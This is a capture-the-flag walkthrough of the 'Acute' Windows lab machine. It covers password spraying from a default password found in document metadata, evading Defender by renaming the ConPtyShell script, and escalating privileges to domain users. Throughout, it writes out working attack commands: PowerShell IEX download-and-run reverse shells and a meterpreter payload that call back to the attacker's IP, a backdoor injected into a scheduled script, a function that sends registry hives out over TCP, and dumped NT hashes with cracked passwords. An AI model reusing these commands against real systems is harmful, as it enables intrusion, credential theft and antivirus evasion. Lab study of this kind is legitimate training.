Acute
Recon
HTTPs (443)
When we visit domain we get the pages. On /about.html there's new header which allows us to download Starter Forms.
└─$ curl -kLOs https://atsserver.acute.local/New_Starter_CheckList_v7.docx
└─$ exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number : 12.76
File Name : New_Starter_CheckList_v7.docx
Directory : .
File Size : 35 kB
File Modification Date/Time : 2024:12:20 04:39:27-05:00
File Access Date/Time : 2024:12:20 04:39:34-05:00
File Inode Change Date/Time : 2024:12:20 04:39:27-05:00
File Permissions : -rw-rw-r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x079b7eb2
Zip Compressed Size : 428
Zip Uncompressed Size : 2527
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
Revision Number : 8
Last Printed : 2021:01:04 15:54:00Z
Create Date : 2021:12:08 14:21:00Z
Modify Date : 2021:12:22 00:39:00Z
Template : Normal.dotm
Total Edit Time : 2.6 hours
Pages : 3
Words : 886
Characters : 5055
Application : Microsoft Office Word
Doc Security : None
Lines : 42
Paragraphs : 11
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company : University of Marvel
Links Up To Date : No
Characters With Spaces : 5930
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000
└─$ open New_Starter_CheckList_v7.docxDefault Password:
Password1!
There's 1 more link: https://atsserver.acute.local/Acute_Staff_Access
FCastle doesn't work, but we have format used for usernames.
In the /about.html we have usernames:
...these members include Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins.# Usernames
AWallace
CHall
EDavies
IMonks
JMorgan
LHopkins
# Passwords
Password1!
Staff Access (EDavies)
Creds:
EDavies:Password1!:Acute-PC01
PS C:\Users\edavies\Documents>
User Name SID
============= ==============================================
acute\edavies S-1-5-21-1786406921-1914792807-2072761762-1106
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Kerberos support for Dynamic Access Control on this device has been disabled.There's no webserver on this computer, but there's Utils
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/7/2019 9:14 AM PerfLogs
d-r--- 12/6/2021 11:06 AM Program Files
d-r--- 12/7/2021 12:43 PM Program Files (x86)
d-r--- 12/21/2021 10:50 PM Users
d----- 1/31/2022 12:29 AM Utils
d----- 12/16/2021 1:23 AM Windows
PS C:\> cd utils
PS C:\utils> ls -force
Directory: C:\utils
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 12/21/2021 6:41 PM 148 desktop.ini
PS C:\utils> cat .\desktop.ini
[.ShellClassInfo]
InfoTip=Directory for Testing Files without DefenderIt seems like Defender is disabled for this directory.
Reverse Shell
Let's upgrade the shell.
ConPtyShell gets detected by defender and doesn't give callback.
└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444
---
PS C:\utils> IEX(IWR http://10.10.14.123/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.123 4444Since Defender is signature based we can replace certain words to make the powershell script legitimate, by doing so Defender doesn't get angry and we get a callback.
└─$ sed '/<#/,/#>/d; s/ConPtyShell/Letmein/g' Invoke-ConPtyShell.ps1 > Invoke-Letmein.ps1
---
PS C:\utils> IEX(IWR http://10.10.14.123/Invoke-Letmein.ps1 -UseBasicParsing); Invoke-Letmein 10.10.14.123 4444Fix the terminal size using your stty size: docs
$width=210
$height=45
$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)
$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)Enumerate with winpeas
PS C:\> curl.exe 10.10.14.123/wp.exe -o /Utils/wp.exe
PS C:\Utils> .\wp.exe | tee -filepath wp.log
╔══════════╣ AV Information
[X] Exception: Access denied
No AV was detected!!
whitelistpaths: C:\Utils
C:\Windows\System32
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
╔══════════╣ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.19041.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\edavies\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 6B
╔══════════╣ Checking KrbRelayUp
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (ACUTE) so it could be vulnerable.
╚ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
╔══════════╣ Checking If Inside Container
╚ If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container
╔══════════╣ RDP Sessions
Not Found
╔══════════╣ Ever logged users
[X] Exception: Access denied
Not Found
╔══════════╣ Home folders found
C:\Users\administrator.ACUTE
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\edavies : edavies [AllAccess]
C:\Users\jmorgan
C:\Users\Natasha
C:\Users\Public
╔══════════╣ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : Acute
DefaultUserName : edavies
DefaultPassword : Password1!
╔══════════╣ Checking Credential manager
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-manager-windows-vault
[!] Warning: if password contains non-printable characters, it will be printed as unicode base64 encoded string
[!] Unable to enumerate credentials automatically, error: 'Win32Exception: System.ComponentModel.Win32Exception (0x80004005): A specified logon session does not exist. It may already have been terminated'
Please run:
cmdkey /list
╔══════════╣ Looking for possible password files in users homes
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
C:\Users\edavies\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\2.0.0.0\passwords.txt
╔══════════╣ Looking for Linux shells/distributions - wsl.exe, bash.exe
C:\Windows\System32\wsl.exeGet-Process shows 2 active sessions: 0 and 1. We are probably 0 since we have powershell, but 1 is some other user.
PS C:\Utils> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
134 9 6316 11988 0.02 644 0 conhost
98 7 1512 5468 1.66 1168 0 conhost
342 14 1624 4808 492 0 csrss
167 11 1536 4668 576 1 csrss
354 17 3108 12112 3292 0 dasHost
705 27 18136 40172 972 1 dwm
37 6 1452 3744 796 0 fontdrvhost
0 0 60 8 0 0 Idle
707 38 18264 63532 964 1 LogonUI
1014 28 4868 15416 668 0 lsass
0 0 172 15628 1816 0 Memory Compression
210 12 1904 684 748 0 MicrosoftEdgeUpdate
379 18 15828 29596 3532 0 MoUsoCoreWorker
209 11 3952 10580 3736 0 NisSrv
613 28 119680 131432 4.64 1276 0 powershell
0 11 2584 17288 72 0 Registry
318 11 3248 7612 660 0 services
105 7 3508 6472 3356 0 SgrmBroker
53 3 1060 1108 384 0 smss
419 21 12176 17528 480 0 svchost
393 14 3508 10968 564 0 svchost
662 19 12472 17888 688 0 svchost
1220 20 6880 16928 804 0 svchost
700 38 8384 23340 860 0 svchost
618 17 3620 9632 888 0 svchost
208 13 1784 7524 1028 0 svchost
572 28 53316 53500 1044 0 svchost
831 54 8664 22980 1160 0 svchost
410 31 12160 20176 1416 0 svchost
427 24 3424 11568 1444 0 svchost
278 14 3112 9584 1476 0 svchost
126 8 1492 6292 1924 0 svchost
362 12 2176 9068 1932 0 svchost
205 11 1848 7992 2788 0 svchost
364 18 4312 15676 2932 0 svchost
350 21 3148 10092 3260 0 svchost
137 9 4080 12256 3520 0 svchost
211 12 2316 9892 3772 0 svchost
240 14 7044 19716 3868 0 svchost
1436 0 192 144 4 0 System
111 7 1352 6364 3616 0 uhssvc
162 11 1352 6656 568 0 wininit
216 11 2148 8456 636 1 winlogon
716 35 116392 138604 2.77 500 0 wsmprovhost
376 24 39248 48416 0.66 2732 0 wsmprovhostPS C:\Users\edavies\Documents> qwinsta.exe
SESSIONNAME USERNAME ID STATE TYPE DEVICE
console edavies 1 Active └─$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=tun0 LPORT=4445 -o rev4445.exe
└─$ msfconsole -q -x 'use multi/handler; set LHOST tun0; set LPORT 4445; set payload windows/meterpreter/reverse_tcp; run'
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.123:4445
---
PS C:\Utils> curl.exe 10.10.14.123/rev4445.exe -Os
PS C:\Utils> .\rev4445.exe
---
[*] Sending stage (176198 bytes) to 10.129.76.192
[*] Meterpreter session 1 opened (10.10.14.123:4445 -> 10.129.76.192:49810) at 2024-12-20 05:41:40 -0500
meterpreter > getuid
Server username: ACUTE\edaviesmeterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
72 4 Registry
408 4 smss.exe
460 640 svchost.exe
476 640 svchost.exe
512 500 csrss.exe
580 500 wininit.exe
588 572 csrss.exe
640 580 services.exe
672 580 lsass.exe
680 572 winlogon.exe
736 640 svchost.exe
800 580 fontdrvhost.exe
808 640 svchost.exe
816 680 fontdrvhost.exe
872 640 svchost.exe
900 640 svchost.exe
976 640 svchost.exe
980 680 dwm.exe
1052 640 svchost.exe
1060 640 svchost.exe
1132 640 svchost.exe
1420 640 svchost.exe
1440 640 svchost.exe
1476 640 svchost.exe
1508 640 MsMpEng.exe
1768 4 Memory Compression
1896 640 svchost.exe
1908 640 svchost.exe
2104 4356 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
2128 4356 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
2476 640 svchost.exe
2540 640 SecurityHealthService.exe
2544 640 svchost.exe
2616 476 CompatTelRunner.exe
2656 6124 rev4445.exe x86 0 ACUTE\edavies C:\Utils\rev4445.exe
2888 640 svchost.exe
2916 476 wermgr.exe
3000 2616 conhost.exe
3008 808 smartscreen.exe x64 1 ACUTE\edavies C:\Windows\System32\smartscreen.exe
3012 640 svchost.exe
3280 476 sihost.exe x64 1 ACUTE\edavies C:\Windows\System32\sihost.exe
3292 640 svchost.exe x64 1 ACUTE\edavies C:\Windows\System32\svchost.exe
3304 5280 conhost.exe x64 1 ACUTE\edavies C:\Windows\System32\conhost.exe
3380 476 MicrosoftEdgeUpdate.exe
3400 476 taskhostw.exe x64 1 ACUTE\edavies C:\Windows\System32\taskhostw.exe
3616 476 OneDriveStandaloneUpdater.exe x64 1 ACUTE\edavies C:\Users\edavies\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
3656 3644 explorer.exe x64 1 ACUTE\edavies C:\Windows\explorer.exe
3744 4356 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
3748 808 TiWorker.exe
3808 640 svchost.exe x64 1 ACUTE\edavies C:\Windows\System32\svchost.exe
3824 640 NisSrv.exe
4084 476 taskhostw.exe x64 1 ACUTE\edavies C:\Windows\System32\taskhostw.exe
4220 808 StartMenuExperienceHost.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
4296 808 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
4308 640 svchost.exe
4356 3656 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4368 3656 OneDrive.exe x64 1 ACUTE\edavies C:\Users\edavies\AppData\Local\Microsoft\OneDrive\OneDrive.exe
4392 4356 msedge.exe x64 1 ACUTE\edavies C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
4492 808 SearchApp.exe x64 1 ACUTE\edavies C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
4652 808 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
4692 808 WmiPrvSE.exe
4716 6080 conhost.exe x64 1 ACUTE\edavies C:\Windows\System32\conhost.exe
4996 808 RuntimeBroker.exe x64 1 ACUTE\edavies C:\Windows\System32\RuntimeBroker.exe
5144 2616 CompatTelRunner.exe
5280 476 cmd.exe x64 1 ACUTE\edavies C:\Windows\System32\cmd.exe
5288 808 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exe
5360 808 WmiPrvSE.exe
5376 640 TrustedInstaller.exe
5680 640 SgrmBroker.exe
5688 640 svchost.exe
5752 640 uhssvc.exe
5784 5280 Utilman.exe x64 1 ACUTE\edavies C:\Windows\System32\Utilman.exe
5820 808 MoUsoCoreWorker.exe
5908 640 svchost.exe
6080 3656 powershell.exe x64 1 ACUTE\edavies C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6124 808 wsmprovhost.exe x64 0 ACUTE\edavies C:\Windows\System32\wsmprovhost.exemeterpreter > migrate 3656
[*] Migrating from 2656 to 3656...
[*] Migration completed successfully.
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/woyag/Desktop/Rooms/Acute/SnTSkQdz.html
[*] Streaming...Privilege Escalation (imonks)
Creds:
imonks:W3_4R3_th3_f0rce.
meterpreter > shell
C:\Windows\system32>powershell
PS C:\Windows\system32> $username = "acute\imonks"
PS C:\Windows\system32> $passwd = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."
PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential($username, $passwd)$username = "acute\imonks"
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { whoami }
acute\imonks
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { IEX(IWR http://10.10.14.123/Invoke-Letmein.ps1 -UseBasicParsing); Invoke-Letmein 10.10.14.123 4444; }
Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { id }User.txt
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat ../Desktop/user.txt }
4635fd7a67cc1f63dbf88272c5bb81d4Privilege Escalation (jmorgan)
I tried getting reverse shell in same manner as EDavies, but no command was working on ATTSERVER. List the available commands for powershell:
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { Get-Command }
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... ATSSERVER
Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls ../ -rec }
Directory: C:\Users\imonks
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d-r--- 21/12/2021 22:29 Desktop ATSSERVER
d-r--- 21/12/2021 16:01 Documents ATSSERVER
d-r--- 15/09/2018 08:12 Downloads ATSSERVER
d-r--- 15/09/2018 08:12 Favorites ATSSERVER
d-r--- 15/09/2018 08:12 Links ATSSERVER
d-r--- 15/09/2018 08:12 Music ATSSERVER
d-r--- 15/09/2018 08:12 Pictures ATSSERVER
d----- 15/09/2018 08:12 Saved Games ATSSERVER
d-r--- 15/09/2018 08:12 Videos ATSSERVER
Directory: C:\Users\imonks\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 20/12/2024 16:51 34 user.txt ATSSERVER
-a---- 11/01/2022 18:04 602 wm.ps1 ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat ../Desktop/wm.ps1 }
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $credsWe can't decode this string locally ConvertTo-SecureString : Key not valid for use in specified state.
We do have permissions to write to files, but can we execute?
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 }
PSComputerName : ATSSERVER
RunspaceId : a13b6e27-0822-4025-835e-d38c56eb77d4
ObjectId : {1}\\ACUTE-PC01\root/Microsoft/Windows/Storage/Providers_v2\WSP_Volume.ObjectId="{8ccfebca-48c0-11ec-9ffe-806e6f6e6963}:VO:\\?\Volume{0eed1261-0000-0000-0000-100000000000}\""
PassThroughClass :
PassThroughIds :
PassThroughNamespace :
PassThroughServer :
UniqueId : \\?\Volume{0eed1261-0000-0000-0000-100000000000}\
AllocationUnitSize : 4096
DedupMode : 4
DriveLetter :
DriveType : 3
FileSystem : NTFS
FileSystemLabel : System Reserved
FileSystemType : 14
HealthStatus : 0
OperationalStatus : {2}
Path : \\?\Volume{0eed1261-0000-0000-0000-100000000000}\
Size : 52424704
SizeRemaining : 20611072
...PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ((cat C:\Users\imonks\Desktop\wm.ps1) -Replace "Get-Volume", "IEX(IWR http://10.10.14.123/Invoke-Letmein.ps1 -UseBasicParsing); Invoke-Letmein 10.10.14.123 4444;") | Set-Content C:\Users\imonks\Desktop\wm.ps1 }
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat C:\Users\imonks\Desktop\wm.ps1 }
PS C:\Utils> Start-Job -ScriptBlock { $username = "acute\imonks"; $passwd = ConvertTo-SecureString -AsPlainText -Force "W3_4R3_th3_f0rce."; $cred = New-Object System.Management.Automation.PSCredential($username, $passwd); Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 } }PS C:\Windows\system32> whoami /all
User Name SID
============= ==============================================
acute\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:\> hostname
Acute-PC01We are admin user, but we are still on Acute-PC01 for some reason, even tho commands were issued on ATTSERVER 🤔
There's odd directory in /Program Files, but we the administrator can't read it (?). Unfortunately we can't run
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls '/Program Files' }
Directory: C:\Program Files
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 21/12/2021 00:04 common files ATSSERVER
d----- 21/12/2021 00:11 Hyper-V ATSSERVER
d----- 15/09/2018 08:12 internet explorer ATSSERVER
d----- 01/02/2022 19:41 keepmeon ATSSERVER
d----- 21/12/2021 00:04 VMware ATSSERVER
d----- 20/12/2021 21:19 Windows Defender ATSSERVER
d----- 20/12/2021 21:12 Windows Defender Advanced Threat ATSSERVER
d----- 21/12/2021 14:13 WindowsPowerShell ATSSERVER
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls '/Program Files/keepmeon' }
Access to the path 'C:\Program Files\keepmeon' is denied.
+ CategoryInfo : PermissionDenied: (C:\Program Files\keepmeon:String) [Get-ChildItem], UnauthorizedAccess Exception
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+ PSComputerName : ATSSERVER# As the jmorgan
nc -lvnp 4444 > sam.save &
nc -lvnp 4445 > system.save &
nc -lvnp 4446 > security.save &
---
PS C:\Users> function SendOverTcp { param([string]$server, $port, $filePath); ($tcpClient = New-Object Net.Sockets.TcpClient($server, $port)).GetStream().Write(($bytes = [IO.File]::ReadAllBytes($filePath)), 0, $bytes.Length); $tcpClient.Close() }
PS C:\Users> whoami
acute\jmorgan
PS C:\Users> cd jmorgan/Music
PS C:\Users\jmorgan\Music> reg save hklm\sam sam.save
PS C:\Users\jmorgan\Music> reg save hklm\system system.save
PS C:\Users\jmorgan\Music> reg save hklm\security security.save
PS C:\Users\jmorgan\Music> $server = "10.10.14.123";
PS C:\Users\jmorgan\Music> $port = 4444; $filePath = "C:\users\jmorgan\music\sam.save"; SendOverTcp "$server" "$port" "$filePath"
PS C:\Users\jmorgan\Music> $port = 4445; $filePath = "C:\users\jmorgan\music\system.save"; SendOverTcp "$server" "$port" "$filePath"
---
└─$ impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x44397c32a634e3d8d8f64bff8c614af7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:d0ffff99f06b17c84500af8e4ddff5ce291eb3432697a1ffb217e83d6b0732d75c897ec8050d4814c90ed10618a30013ddaf0ef1511fc1fcd140f806613365dcaa7ae7d36fb7c97a08dc31e48898048b3ac54c1d9caeb28e3c3ad1b23025a562e63c3b77cc733b281bd30717ee96bd9381d914a5fc6224356341287d4b1673026810e17591458368e4049ddc45fc5e6a03c2d194b31e968dc34862242815a2da2cf55889b40a92bc63ac1737e04576baa127630c488829f33be169aeb0b3d07f5978ee458a21baec91d373df26a45f06ffb929424cef5e8ec95cf31944c59f6ed2f59e32326944fc77cab250ce7f191b
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8cb6777ad4f5aa672d41a1f5c41f9640
[*] DPAPI_SYSTEM
dpapi_machinekey:0x574d0cc939c9f986cba32d1546a7fa28747425e0
dpapi_userkey:0x4a77ea6673a027ecd81e4ca010b1d3f70fe1d9cd
[*] NL$KM
0000 62 2A 29 8D F9 77 CC DD EE EB 23 20 B2 E2 AF 59 b*)..w....# ...Y
0010 0B F6 33 E0 95 5D B0 03 B1 01 85 55 9D 16 64 4D ..3..].....U..dM
0020 53 1F 93 7B FB EF 2B F7 6E 76 B1 02 3D 63 CC DF S..{..+.nv..=c..
0030 F0 35 6F E3 19 8A 69 C1 2E F6 78 80 45 51 EE 0A .5o...i...x.EQ..
NL$KM:622a298df977ccddeeeb2320b2e2af590bf633e0955db003b10185559d16644d531f937bfbef2bf76e76b1023d63ccdff0356fe3198a69c12ef678804551ee0a
[*] Cleaning up...➜ cat .\hashes
a29f7623fd11550def0192de9246f46b
31d6cfe0d16ae931b73c59d7e0c089c0
31d6cfe0d16ae931b73c59d7e0c089c0
24571eab88ac0e2dcef127b8e9ad4740
29ab86c5c4d2aab957763e5c1720486d
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt --format=NT .\hashes
Password@123 (?)Privilege Escalation (awallace)
Get users on DC
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net user }
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins$cred = New-Object System.Management.Automation.PSCredential("acute\awallace", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
$cred = New-Object System.Management.Automation.PSCredential("acute\lhopkins", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
$cred = New-Object System.Management.Automation.PSCredential("acute\chall", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { whoami }Only awallace worked.
PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential("acute\awallace", (ConvertTo-SecureString -AsPlainText -Force "Password@123"))
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { whoami }
acute\awallacePS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { ls '/Program Files/keepmeon' }
Directory: C:\Program Files\keepmeon
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { cat '/Program Files/keepmeon/keepmeon.bat' }
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
Script Purpose: The script recursively iterates through all .bat files in the current directory and its subdirectories, executing each one except itself.
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net group }
*Domain Admins
...
*Site_Admin
PS C:\Windows\system32> Invoke-Command -ComputerName ATSSERVER -Configuration dc_manage -Credential $cred -ScriptBlock { net group site_admin }
Group name Site_Admin
